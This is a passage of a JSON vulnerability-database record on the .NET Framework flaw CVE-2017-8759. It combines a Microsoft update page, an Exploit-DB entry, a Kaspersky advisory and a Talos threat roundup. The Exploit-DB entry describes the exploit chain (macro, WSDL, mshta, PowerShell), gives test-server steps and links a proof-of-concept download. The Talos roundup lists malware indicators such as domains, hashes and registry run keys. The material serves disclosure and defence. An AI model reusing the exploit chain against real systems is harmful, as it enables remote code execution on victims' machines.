update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/4019113\"><u>4019113</u></a>, <a href=\"https://support.microsoft.com/help/4035037\"><u>4035037</u></a>, <a href=\"https://support.microsoft.com/help/4014982\"><u>4014982</u></a>, and <a href=\"https://support.microsoft.com/help/4032114\"><u>4032114</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040955\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040955</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017</span></li><li><a data-content-id=\"4040959\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040959</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows Server 2012: September 12, 2017</li><li><a data-content-id=\"4040965\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040965</a>\u00a0Description of the Security Only update for the .NET Framework 3.5 for Windows Server 2012: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041091", "href": "https://support.microsoft.com/en-us/help/4041091/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-09-13T20:42:41", "description": "Microsoft Windows .NET Framework - Remote Code Execution. CVE-2017-8759. Remote exploit for Windows platform", "published": "2017-09-13T00:00:00", "type": "exploitdb", "title": "Microsoft Windows .NET Framework - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-13T00:00:00", "id": "EDB-ID:42711", "href": "https://www.exploit-db.com/exploits/42711/", "sourceData": "Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\r\n\r\nRunning CVE-2017-8759 exploit sample.\r\n\r\nFlow of the exploit:\r\n\r\nWord macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe\r\n\r\nTo test:\r\n\r\nRun a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080\r\n\r\nIf all is good mspaint should run.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42711/"}], "kaspersky": [{"lastseen": "2020-09-02T11:45:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "description": "### *Detect date*:\n09/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn improper validation of untrusted input was found in Microsoft .NET Framework. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed document or application.\n\n### *Affected products*:\nMicrosoft .NET Framework 4.7 \nMicrosoft .NET Framework 2.0 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 4.6.1 \nMicrosoft .NET Framework 4.6.2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) \n[CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2017-8759](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4040955](<http://support.microsoft.com/kb/4040955>) \n[4040956](<http://support.microsoft.com/kb/4040956>) \n[4040957](<http://support.microsoft.com/kb/4040957>) \n[4040958](<http://support.microsoft.com/kb/4040958>) \n[4040959](<http://support.microsoft.com/kb/4040959>) \n[4040960](<http://support.microsoft.com/kb/4040960>) \n[4040964](<http://support.microsoft.com/kb/4040964>) \n[4040965](<http://support.microsoft.com/kb/4040965>) \n[4040966](<http://support.microsoft.com/kb/4040966>) \n[4040967](<http://support.microsoft.com/kb/4040967>) \n[4040971](<http://support.microsoft.com/kb/4040971>) \n[4040972](<http://support.microsoft.com/kb/4040972>) \n[4040973](<http://support.microsoft.com/kb/4040973>) \n[4040974](<http://support.microsoft.com/kb/4040974>) \n[4040975](<http://support.microsoft.com/kb/4040975>) \n[4040977](<http://support.microsoft.com/kb/4040977>) \n[4040978](<http://support.microsoft.com/kb/4040978>) \n[4040979](<http://support.microsoft.com/kb/4040979>) \n[4040980](<http://support.microsoft.com/kb/4040980>) \n[4040981](<http://support.microsoft.com/kb/4040981>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "edition": 39, "modified": "2020-06-18T00:00:00", "published": "2017-09-12T00:00:00", "id": "KLA11101", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11101", "title": "\r KLA11101Arbitrary code execution vulnerability in Microsoft .NET Framework ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-01-29T19:59:50", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "Today, Talos is publishing a glimpse into the most prevalent threats we've observed between December 29 and January 05. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nThe most prevalent threats highlighted in this round up are: \n \n\n\n * **Doc.Downloader.Trickbot-6412300-1** \nOffice Macro Downloader \nThis downloader was submitted to ThreatGrid more than 50 times on December 26. This office document downloads a multipayload Trickbot loader. This post-Christmas gift is not something that somebody just back from the holiday wants to open. \n \n * **Doc.Dropper.Agent-6412231-0** \nOffice Macro Downloader \nThis is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. The sample was unable to download the next stage so no further analysis is available. \n \n * **Doc.Macro.Necurs-6412436-0** \nDownloader \nAnother wave of OLE based downloaders spiked in prevalence just prior to the new year. The samples use obfuscated VBA macros to download various malware families distributed for the Necurs botnet, including Locky. \n \n * **Ppt.Downloader.CVE_2017_8759-6413368-0** \nOffice Macro Downloader \nThese PowerPoint files contain an XML, located in ppt/slides/_rels/slide1.xml.rels, with a malicious SOAP WSDL definition that leverages CVE-2017-8759. If the file is saved as a PPSX, the slideshow will automatically start on opening, triggering the malicious code. \n \n * **Win.Ransomware.PolyRansom-6413978-0** \nRansomware \nPolyRansom variants continue to thrive in 2018. PolyRansom is polymorphic ransomware that spreads by infecting other executables. It gains persistence through an installed service, and run keys added to the registry. Its primary infection vectors are share network drives, removable media, and email. \n \n * **Win.Trojan.Generic-6414413-0** \nTrojan \nThis cluster provides generic detection for the Emotet Trojan downloaded onto a targets machine. Emotet is a banking trojan that has remained relevant due to its continual evolution to by pass antivirus products. \n \n * **Win.Trojan.Multi-6413508-0** \nTrojan \nThis trojan will potentially connect to one or more servers to receive instructions and download additional malware. \n \n\n* * *\n\n## Threats\n\n### Doc.Downloader.Trickbot-6412300-1\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * N/A\n**Mutexes** \n\n\n * 316D1C7871E00\n * Global\\552FFA80-3393-423d-8671-7BA046BB5906\n * \\BaseNamedObjects\\C1A8DFE67F9832960\n**IP Addresses** \n\n\n * 89[.]161[.]153[.]74\n**Domain Names** \n\n\n * jas-pol[.]com[.]pl\n**Files and or directories created** \n\n\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Temp\\Inue8.bat\n * %AppData%\\localservice\\Wn-lbzpms.exe\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Temp\\mo-r.exe\n * %AppData%\\localservice\\mo-r.exe\n * %TEMP%\\Ecmjtqf.bat\n * %AppData%\\localservice\\Modules\\injectDll64_configs\\sinj\n * %AppData%\\localservice\\Modules\\injectDll64_configs\\dinj\n * %TEMP%\\Wn-lbzpms.exe\n**File Hashes** \n\n\n * 3e5a5c672052182d9d10b0d094f07ec67f182939556c90f66236d75d4e795cd6\n * 07a1d83e2fdce0b0383fc05e2931d3aa557e3eeeeca50762258431ecf6fc2c50\n \n\n\n#### Coverage\n\n[](<https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://4.bp.blogspot.com/-BXqVeU9qBGM/Wk_T-zvobmI/AAAAAAAABlA/VKop4GvYskIai2FuJRRfiWrDBKUt9kqlgCLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_amp.png>)\n\n \n\n\n \n**ThreatGrid** \n\n\n[](<https://3.bp.blogspot.com/-wsyllq65EuI/Wk_UCwWAJ_I/AAAAAAAABlE/JxbQKg4LGq057JDIlTgUMUV6CG8EIBlBgCLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_threatgrid.png>)\n\n \n\n\n \n**Umbrella** \n\n\n[](<https://3.bp.blogspot.com/-VBqCazWAjaw/Wk_UF1Z-3VI/AAAAAAAABlI/c1KdBUQeL4MHEQ1vPeDckEnyiGgrn38RACLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_umbrella.png>)\n\n \n\n\n \n**Screenshot** \n\n\n[](<https://4.bp.blogspot.com/-XSt0ytvQJO4/Wk_UJfLCueI/AAAAAAAABlM/VgdxMj5I0usggoC0B74rcq-0ra-txkjAwCLcBGAs/s1600/Doc_Trojan_XMasInvoice_6412300_0_malware.png>)\n\n \n\n\n \n \n \n\n\n* * *\n\n \n\n\n### Doc.Dropper.Agent-6412231-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * N/A\n**Mutexes** \n\n\n * N/A\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * weekendfakc[.]top\n**Files and or directories created** \n\n\n * N/A\n**File Hashes** \n\n\n * 024782b5d080879af2a7a4280d262929e85e9815b2b37e9aeb6384a26e97895e\n * 0ad1db5a012d54fe11b06cf8b8822135e5285e21ab99e7ae5c8ca1892836375b\n * 1283fc95f56f1f32dcfeb5ec042a53f6e0dbd05d49c5bbc892e389cfc5613d9a\n * 1a5257c6cd2e03848758d9541cbf4918194ff33669029a06baee9317d1a9a527\n * 211e5c8d07af1e6b61acb7af8bb1e0fefe25bee88275f2db8d53f868dc991e0e\n * 23c8026cd6414fa083f83c856c9142af5905747eabb32d0d0d839e21f941bf3e\n * 25191548ef2032df4acb687d940854f134de3aa738b69fc578e5397e95496afd\n * 28f9a67de7f6b79b4bf66da9d114c723e16d619f6787257eff856c71b1c7047f\n * 29062cd2c2d09199fc0716485e0e3a1fff880195a92c78ecd5f0e5184ac07820\n * 2b24aa417d6ab02fa9f82be1a41bc8c2e5de814057ed76074e2960d74f31d2d1\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://1.bp.blogspot.com/-WslsEQFIdk8/Wk_UULUA-mI/AAAAAAAABlQ/V-UtGjwPYUgihs5hC1WJf_DDL_PEvBjKwCLcBGAs/s1600/Doc_Dropper_Agent_6412231_0_amp.png>)\n\n \n\n\n \n**ThreatGrid** \n\n\n[](<https://4.bp.blogspot.com/-8PRx0PfAALE/Wk_UYROiUtI/AAAAAAAABlU/r_YpWkHKku4I-yr7mZM9LZ5rPMZ7zqiXwCLcBGAs/s1600/Doc_Dropper_Agent_6412231_0_threatgrid.png>)\n\n \n\n\n \n**Umbrella** \n\n\n[](<https://2.bp.blogspot.com/-ObamQFjNPdM/Wk_UcV3nSFI/AAAAAAAABlY/FkIDvLrSVvgRJTFLGRh0eK4ABaY8a0hqgCLcBGAs/s1600/Doc_Dropper_Agent_6412231_0_umbrella.png>)\n\n \n\n\n \n \n \n \n\n\n* * *\n\n \n\n\n### Doc.Macro.Necurs-6412436-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * **<HKCU>\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce**\n**Mutexes** \n\n\n * Groove:PathMutex:tzanqCjN6dCs1QGzbKslin0UfIk=\n**IP Addresses** \n\n\n * 98[.]124[.]252[.]145\n**Domain Names** \n\n\n * pragmaticinquiry[.]org\n**Files and or directories created** \n\n\n * %TEMP%\\ASPNETSetup_00001.log..doc\n * \\Users\\Administrator\\AppData\\Local\\Adobe\\Acrobat\\9.0\\Updater\\updater.log..doc\n * \\Users\\Administrator\\Read___ME.html\n * %TEMP%\\ASPNETSetup.log..doc\n * \\Users\\Administrator\\AppData\\Local\\Adobe\\Acrobat\\9.0\\Updater\\Read___ME.html\n**File Hashes** \n\n\n * a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d\n * d4a8da30821df543407bcbbc25bf2a89db3d3f5c8d49fddeddaecd3b47c111ef\n * a9db16baffc0b92aacae6647952fc2d32673998fc035493d50d32bad5bceb516\n * f07f747978b7d8bed904ccadbcc49f184bc16e872f22d7b53b1030bc22ebd794\n * 9b48b6bc6ee491a2b180d6b353ae8f8da230f27a0cdfc1757c58a4819664b790\n * 0c51e3df0b09f14e04b268102afc9342c35fcc2460c645f9c8d21b2413910d32\n * 0cfdad54484cf1d4ff9be267469edefdb98e963ffabd6beeb081a208e3fca9ac\n * 1c2f0a28b5c13eb2967078d947924c9a4a5f8f845d3899986df19e8a166d3ec0\n * 241f83caf5c5a23a1d7adbeaa8c392da0edadff362f41bbb5727dc71887048c4\n * 305790984d5ffa713794c1732eea4f83f18da6926e415a490b2fc090f2c4e8dc\n * 305f855ff8d47be5cc2d57e137a436bb2e17b1783f6cc5b8302c2df56b75afd7\n * 32d85f3dded85d0375965a50991ddb7b608166f51a12b297ae981348119512da\n * 36fc2029280816810324e3be9cf3a4257f0dbb1a8b11eaffdbacdead863aaf44\n * 3abdf9d8249e3cc7507529aec80d93551f1fcd714a61861a69c059662aa39e9f\n * 495b93c1a9940e94c14063b1e52877864d54fb544a3a32e923b0530cb03c96cf\n * 4c04d8aeebdd0eb1747a9a66b10e4681328a03edcbcbd0e9921c4a74367bbd08\n * 580b05987531aa4ef4bed150bd51fdbbcad5f95abb63e8439e3d4bb07eb68598\n * 5c4d5f6d7d0a8d4e805c1341cadf76a924aa2fe6437d432d96f103c4319e84c2\n * 6e35534f8b79187dbe2fbdd1b0a21b03752a89df5981cb6fb89154eb7b34a087\n * 8f36a3ebcb2714d7f6d99d8d0672bcdf16980da788331953cba52c21fde64efb\n * 962beb562acef288c5ef09f14e366d7ff3f51a00dd28b3dc5c0e388c92d3c0a2\n * c2f482372523031b880b7a4f1909b30b5aa20304d0a691309484ad49a0c451d5\n * cab8fcbe8bce311464418e2fcd05e55353255c511e698726e009f075de82e2ea\n * ce5d33fb70fc7834d8faa7749d5cedbcb6b0958105ebe94633e2daba897612ef\n * d18256e9f4062259e941028c531c5219b63446a35c524ef00554c69de2110e98\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://3.bp.blogspot.com/-1LosH-Ljn44/Wk_UkXkLYII/AAAAAAAABlg/hTRm1r5WXiAAVvU0wNzWJqA-xLe-L00zACLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_amp.png>)\n\n \n\n\n \n**ThreatGrid** \n\n\n[](<https://2.bp.blogspot.com/-fYjVzFkoLgQ/Wk_UpBN3YwI/AAAAAAAABlk/7lxC1be-ZUccNjiCzGvacmzVvij7WrQPwCLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_threatgrid.png>)\n\n \n\n\n \n**Umbrella** \n\n\n[](<https://2.bp.blogspot.com/-HlZDfNDP9dw/Wk_UuOvHsRI/AAAAAAAABlo/sC3uHpHW6tQhqqZFK_fv8p7UXlV0ZcE7QCLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_umbrella.png>)\n\n \n\n\n \n**Screenshot** \n\n\n[](<https://4.bp.blogspot.com/-oJWXLHkeJFE/Wk_UyOJ8b2I/AAAAAAAABls/367dsCLp98Q9iZN118AqlKg1vyMvjUB4QCLcBGAs/s1600/a3f68a31db23b9c7312219990bfe27bf9bb7c158fde4200c0af7a985bd7ac97d_malware.png>)\n\n \n\n\n \n \n \n\n\n* * *\n\n \n\n\n### Ppt.Downloader.CVE_2017_8759-6413368-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * **<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **VRGTQ\n**Mutexes** \n\n\n * N/A\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * u[.]teknik[.]io\n * kistags[.]com\n * graceland2017[.]com\n * 0i3tenrainy[.]loan\n * goochandhousego[.]pro\n * dayi-yc[.]com\n**Files and or directories created** \n\n\n * %ProgramFiles%\\Rfjd\\confighbch.exe\n * %TEMP%\\dsruxkfs.0.cs\n * %TEMP%\\dsruxkfs.cmdline\n * %TEMP%\\dsruxkfs.err\n * %TEMP%\\i02bp4bi.0.cs\n * %TEMP%\\i02bp4bi.cmdline\n * %TEMP%\\i02bp4bi.dll\n * %TEMP%\\i02bp4bi.err\n * %TEMP%\\tmp95D4.exe\n * %TEMP%\\tmp970E.exe\n * %AppData%\\Roaming\\982PQQP9\\982logrc.ini\n * %TEMP%\\dsruxkfs.out\n * %TEMP%\\svchost.exe\n * %AppData%\\Roaming\\982PQQP9\\982logim.jpeg\n * %AppData%\\Roaming\\982PQQP9\\982logrv.ini\n * %AppData%\\Roaming\\tmp.exe\n * %SystemRoot%\\SysWOW64\\com\\SOAPAssembly\\http100u4teknik4io0HUKzO4png.dll\n * %SystemRoot%\\SysWOW64\\com\\SOAPAssembly\\http100u4teknik4io0HUKzO4png.pdb\n**File Hashes** \n\n\n * 22ae9fc528b63ecfe163c2b4c472e68869e049023be009ef118c59346247082d\n * 129bddde9c3cb01c69d92d9029d5da963a0dd5a72143054f9fa97471a388e9c0\n * 2d92ee55d56e96822aca748c7d69344d90a663e0db77e7ddd0ce9befa54aba98\n * 3894ba1250493f0798f9212fc20e96e8114dcc218850fef13979410dc63affba\n * 3a26d63160a43b64ee4f4adba0a5c19cb3ee6db2dc44c0ffb7b72b621548c4f8\n * 4b4efd1527b404064604707dbf7a143745d764629d6cfcc05a6c204b66238db8\n * 56b951fe25e1d0266dd49eba6b127efe63c49d71063533cee2ba3bb7eac08744\n * 56ede7ef1d1e5216231c847eead200bc8b5c5f8ef7ac8389b7dc5f069b37831d\n * 650abb87b45b41a344c677c0d6bb6a13cbe9a66785b87a0f2ff3fb378220448c\n * 72399fbb24239a2e1897132ad0e3270103c727253275009e010c74a94f36700d\n * 7b58861aab0a53cac5ac90af09723703fb47fda584fc66212ff663c52a8150a4\n * 7ed5fec1aabe2e91524a9a84d2c4f4d29a8da5777289023c40ffbcc7810b2ee8\n * 84593a125442a9541b2992a2934f4db5cbe1a87b6e5f5edd17982e677667c53f\n * 9f9217702cc1d59edc29007f745eeec78118941f3d4f99b2f664a9677867ffb6\n * b28a3bd9be8ec8d9dec980896002d84e2544acb2625e1acbbe8351d57b2b6cfc\n * c0ed86aab56032d1ba313aa6b5eaabcd687caa28937f56f23832206f81ec1271\n * c5b450ac63234f3d23ace0379486a33788187f14b47801971ad96ace76f85410\n \n\n\n#### Coverage\n\n[](<https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://3.bp.blogspot.com/-1khFtIe3Pxw/Wk_U7eMtU3I/AAAAAAAABlw/dxG0yB_eXfsfrO40xBOxARyQdZ8_q1pXgCLcBGAs/s1600/Ppt.Downloader.CVE_2017_8759_6413368_0_amp.png>)\n\n \n\n\n \n**ThreatGrid** \n\n\n[](<https://1.bp.blogspot.com/-Vm5iQvKfOe8/Wk_U-yy4-HI/AAAAAAAABl0/j0PUEO4IKBAwjCk1C5uBgnwQ8XfUIB9cwCLcBGAs/s1600/Ppt.Downloader.CVE_2017_8759_6413368_0_threatgrid.png>)\n\n \n\n\n \n**Umbrella** \n\n\n[](<https://1.bp.blogspot.com/-BkaueOy9oQU/Wk_VCDQsZsI/AAAAAAAABl4/uq1ZjedosKg9hcX3_tZCeO5VRuYG1TzVACLcBGAs/s1600/Ppt.Downloader.CVE_2017_8759_6413368_0_umbrella.png>)\n\n \n\n\n \n \n \n \n\n\n* * *\n\n \n\n\n### Win.Ransomware.PolyRansom-6413978-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * **<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ZSCGIYAL**\n * **Value: **Type\n * **<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **FacAQkYU.exe\n * **<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ZSCGIYAL**\n * **Value: **Start\n * **<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\zscgIYAL**\n**Mutexes** \n\n\n * \\BaseNamedObjects\\mMkUAokE\n * \u00c2\u00eb@\n * MkUUAgkc1\n * \u00ba\u00eb@\n * poAUcoMg1\n * \\BaseNamedObjects\\lEwoEIAg\n * \\BaseNamedObjects\\sgwQgcAM0\n * \u00b2\u00eb@\n * fusUgwwA\n * oskQowMk\n * \u00a2\u00eb@\n * \\BaseNamedObjects\\hYsQEUYI0\n * \\BaseNamedObjects\\ @\n * \u00aa\u00eb@\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * N/A\n**Files and or directories created** \n\n\n * %SystemDrive%\\Documents and Settings\\All Users\\Lgwg.txt\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\nOowsYQI.bat\n**File Hashes** \n\n\n * cd32c7982ceca8711ec2f6c7ad83103db41b5d2c644b9beee07c81f92efa30a5\n * 1ff90f71632162646145cd91a22fdb24683cb25e54254f9c311d54cbc633fb92\n * 377a4c54239536019cef4c3fb2ed835a0142f58d64bc0bf49063440b7700a0b7\n * aff6517827847137411d37bafc0aee2915e87b9d2494493c1723634ba1014792\n * 38c7c22fd8526dd108422befd6fd38212ef45fb30db3272d5016fa942cd2323d\n * 3ab0d96b041b994d6f32a4351120b822d39b681d2c5133f12bb507fe2fb66e19\n * ca8eb5e89426e3c6771a72cffac6998abce9ca2a6011207691e47df1738cdeb6\n * 8957b057803dd6369f877c359b96423b61129fa3f68257c272644e1d56c7c667\n * c4471377f58643e454ef33f21dc65f696567bf8700ae120caac5086f85bfeace\n * 64fac9307649854e520f733df3df40ed960650103a78b8460488319156e059cf\n * 1dd699b7fdb082c35677938f6f064e02e226033f995189889799adac08811a18\n * 9ca5fd8ee403b418f92118836171b72a334caeb94fae9b5b46d6246742bf1345\n * 78286db82473a9f1eddba51f39333a77c2b30fb582e9fe3e71d2924e060eb273\n * 7e888fabc1451dce556864690cc55e70c8236db2a7b01b8726af0a5700ebafea\n * 6f15dc426b87da591d0a2d4965558a22857e2b1c8e1e6fdfe9c36c8a4b50a99c\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://4.bp.blogspot.com/-eOCzoxRTSNk/Wk_VKzTp_6I/AAAAAAAABmA/1QLtMl8-BNM-L4lgUP4dUoMVj4HyXYTFQCLcBGAs/s1600/Win_Ransomware_PolyRansom_6413978_0_amp.png>)\n\n \n\n\n \n**ThreatGrid** \n\n\n[](<https://2.bp.blogspot.com/-diL68H5zf1M/Wk_VOiDel7I/AAAAAAAABmE/Pguwi7b8IrcxjsNj9xpZDeasVMkuvvuWQCLcBGAs/s1600/Win_Ransomware_PolyRansom_6413978_0_threatgrid.png>)\n\n \n\n\n \n**Screenshot** \n\n\n[](<https://3.bp.blogspot.com/-rLc6nuwMDe4/Wk_VVJWjlkI/AAAAAAAABmI/YTwLPY1KufsX8lEuwNXd6nFIHu2A3_0BACLcBGAs/s1600/Win_Ransomware_PolyRansom_6413978_0_malware1.png>)\n\n \n\n\n \n \n \n\n\n* * *\n\n \n\n\n### Win.Trojan.Generic-6414413-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **internat.exe\n * **<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **Microsoft Windows Manager\n * **<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND**\n * **Value: **Start\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **Microsoft Windows Manager\n * **<HKU>\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache**\n * **<HKU>\\Software\\Microsoft\\Windows\\CurrentVersion\\Run**\n * **<HKLM>\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List**\n * **<HKLM>\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run**\n**Mutexes** \n\n\n * \\BaseNamedObjects\\b11\n * b11\n**IP Addresses** \n\n\n * 220[.]181[.]87[.]80\n * 69[.]49[.]96[.]16\n**Domain Names** \n\n\n * www[.]murphysisters[.]org\n**Files and or directories created** \n\n\n * \\DAV RPC SERVICE\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Temporary Internet Files\\Content.IE5\\H3T7LZRL\\m[1].exe\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\cymycvgmtt.exe\n * \\;Z:000000000000d46c\\192.168.0.1\\vm9-116\\\\_\\DeviceConfigManager.exe\n * %AppData%\\winmgr.txt\n * \\;Z:000000000000d46c\\192.168.0.1\\vm9-116\\autorun.inf\n * 